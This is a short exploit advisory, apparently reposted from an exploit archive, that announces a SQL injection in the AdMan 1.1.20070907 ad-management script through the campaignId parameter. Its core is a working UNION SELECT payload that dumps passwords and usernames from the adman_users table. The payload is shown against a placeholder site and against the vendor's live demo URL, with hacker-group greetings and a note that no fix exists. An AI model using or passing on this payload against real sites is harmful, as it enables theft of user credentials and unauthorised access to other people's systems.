AdMan 1.1.20070907 (campaignId) SQL Injection Vulnerability

2008-10-08 21:01:05

############### >>> Remote SQL Injection <<< ###########
## SuB-ZeRo(Walid) ##
################## >>> SuB-ZeRo <<< ################
author : SuB-ZeRo(algeria hackers)
contact : [email protected]


buy script : http://www.formfields.com/adManArea/adManPricing.php
dork : find it
exploit:
www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
L!Ve DeMo :::
http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
NoTe:YoU must singup and login in web sit and you put your exploit
########### Greetz #############
>>> SuB-ZeRo
>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4
>>> all muslims

#

Fixes

No fixes

In order to submit a new fix you need to be registered.